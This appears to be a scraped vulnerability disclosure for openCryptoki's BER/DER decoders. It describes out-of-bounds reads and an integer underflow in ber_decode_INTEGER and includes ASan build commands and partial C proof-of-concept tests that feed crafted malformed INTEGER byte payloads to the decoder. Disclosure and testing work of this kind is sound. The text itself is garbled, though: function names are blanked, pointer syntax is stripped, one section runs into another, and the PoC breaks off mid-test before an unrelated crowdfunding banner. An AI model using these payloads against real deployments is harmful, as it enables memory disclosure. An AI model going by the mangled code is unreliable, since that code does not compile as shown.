openCryptoki BER/DER Decoder Memory Safety Vulnerabilities Analysis

Memory safety vulnerabilities in BER/DER decoders in asn1.c Vulnerability Overview Memory safety vulnerabilities have been discovered in the BER/DER decoding functions of openCryptoki. These vulnerabilities affect all token backends (Soft, ICA, CCA, TPM, EP11, ICSF) because the vulnerable code resides in a shared library. Specific Vulnerabilities CWE-125 (Out-of-Bounds Read): All primitive BER decoders ( , , , , ) accept a raw pointer but lack a buffer length parameter. They trust the length field in the BER encoding without verifying whether it matches the actual buffer boundary. An attacker-controlled length field can cause the decoder to read memory outside the buffer. Additionally, some decoding functions (e.g., ) internally use the decoded length field for further calculations, which may lead to integer underflow and out-of-bounds access. Attack Scenarios openCryptoki processes BER-encoded cryptographic objects (keys, certificates) originating from: Imported PKCS#11 objects via / Token objects loaded from disk ( ) Objects received from remote ICSF/EP11 backends An attacker providing malformed BER-encoded keys or certificates can trigger out-of-bounds reads (information disclosure). Impact Scope Affected Versions: 0 and leading byte is 0x00 2. CWE-125: OOB heap read due to no buffer length validation in decoders 3. CWE-125: OOB read on zero-length INTEGER checking leading zero byte Build: gcc -fsanitize=address,undefined -O0 -fno-omit-frame-pointer \ -I./usr/include -I./usr/lib/common \ -DOSTIL_NAME=\"test\" -DLINUX \ poc_ber_decode.c \ usr/lib/common/.libs/libopenCryptoki-stdl_libpacks11_me_la-sent.o \ usr/lib/common/.libs/libopenCryptoki-stdl_libpacks11_me_la-trace.o \ usr/lib/common/.libs/libopenCryptoki-stdl_libpacks11_me_la-trace.o \ usr/lib/common/.libs/libopenCryptoki-stdl_libpacks11_me_la-utility_common.o \ -lcrypto -L/usr/lib -l:libpthread -lrt -L/usr -o poc_ber_decode \ -fsanitize=address,undefined ./poc_ber_decode / #include #include #include #include / Pull in the project types / #include "pckstypes.h" / Forward declarations matching usr/lib/common/asn1.c / extern CK_RV ber_decode_INTEGER(CK_BYTE ber_len, CK_BYTE data, CK_ULONG data_len, CK_ULONG field_len); extern CK_RV ber_decode_OCTET_STRING(CK_BYTE tag, CK_BYTE data, CK_ULONG data_len, CK_ULONG field_len); extern CK_RV ber_decode_SEQUENCE(CK_BYTE tag, CK_BYTE data, CK_ULONG data_len, CK_ULONG field_len); extern CK_RV ber_decode_BIT_STRING(CK_BYTE tag, CK_BYTE data, CK_ULONG data_len, CK_ULONG field_len); static void hexdump(const char label, const CK_BYTE buf, size_t len) { printf(" %s: %s\n", label, ""); for (size_t i = 0; i 0 and the byte at position [2] is 0x00, the code does: data_len = len - 1; // 0 - 1 = CK_ULONG_MAX / static int test_integer_underflow_short_form(void) { printf("===== TEST 1: ber_decode_INTEGER underflow (short form, len>0) ====\n"); / tag=0x02, len=0x00, followed by 0x00 byte / CK_BYTE payload[] = { 0x02, 0x00, 0x00 }; CK_BYTE data = NULL; CK_ULONG data_len = 0, field_len = 0; hexdump("input", payload, sizeof(payload)); CK_RV rc = ber_decode_INTEGER(payload, data, data_len, field_len); printf(" rc=%d, data_len=%lu (0x%lx), field_len=%lu\n", rc, data_len, data_len, field_len); if (rc == CKR_OK && data_len > 0xFFFFFFFF) { printf(" [VULN] data_len underflowed to %lu (0x%lx)\n", data_len, data_len); return 1; } return 0; } / TEST 2: Integer underflow (long form 1-byte length, len=0) Same bug, different encoding path / static int test_integer_underflow_long1(void) { printf("===== TEST 2: ber_decode_INTEGER underflow (long form 1, len=0) ====\n"); / tag=0x02, 0x81 (1 length octet follows), len=0x00, then 0x00 / CK_BYTE payload[] = { 0x02, 0x81, 0x00, 0x00 }; CK_BYTE data = NULL; CK_ULONG data_len = 0, field_len = 0; hexdump("input", payload, sizeof(payload)); CK_RV rc = ber_decode_INTEGER(payload, data, data_len, field_len); printf(" rc=%d, data_len=%lu (0x%lx), field_len=%lu\n", rc, data_len, data_len, field_len); if (rc == CKR_OK && data_len > 0xFFFFFFFF) { printf(" [VULN] data_len underflowed to %lu (0x%lx)\n", data_len, data_len); return 1; } return 0; } / TEST 3: Integer underflow (long form 2-byte length, len=0) / static int test_integer_underflow_long2(void) { printf("===== TEST 3: ber_decode_INTEGER underflow (long form 2, len=0) ====\n"); / tag=0x02, 0x82 (2 length octets), len=0x0000, then 0x00 / CK_BYTE payload[] = { 0x02, 0x82, 0x00, 0x00, 0x00, 0x00 }; CK_BYTE data = NULL; CK_ULONG data_len = 0, field_len = 0; hexdump("input", payload, sizeof(payload)); CK_RV rc = ber_decode_INTEGER(payload, data, data_len, field_len); printf(" rc=%d, data_len=%lu (0x%lx), field_len=%lu\n", rc, data_len, data_len, field_len); if (rc == CKR_OK && data_len > 0xFFFFFFFF) { printf(" [VULN] data_len underflowed to %lu (0x%lx)\n", data_len, data_len); return 1; } return 0; } / TEST 4: Integer underflow (long form 3-byte length, len=0) / static int test_integer_underflow_long3(void) { printf("===== TEST 4: ber_decode_INTEGER under

Goal Reached Thanks to every supporter — we hit 100%!

openCryptoki BER/DER Decoder Memory Safety Vulnerabilities Analysis

More from this source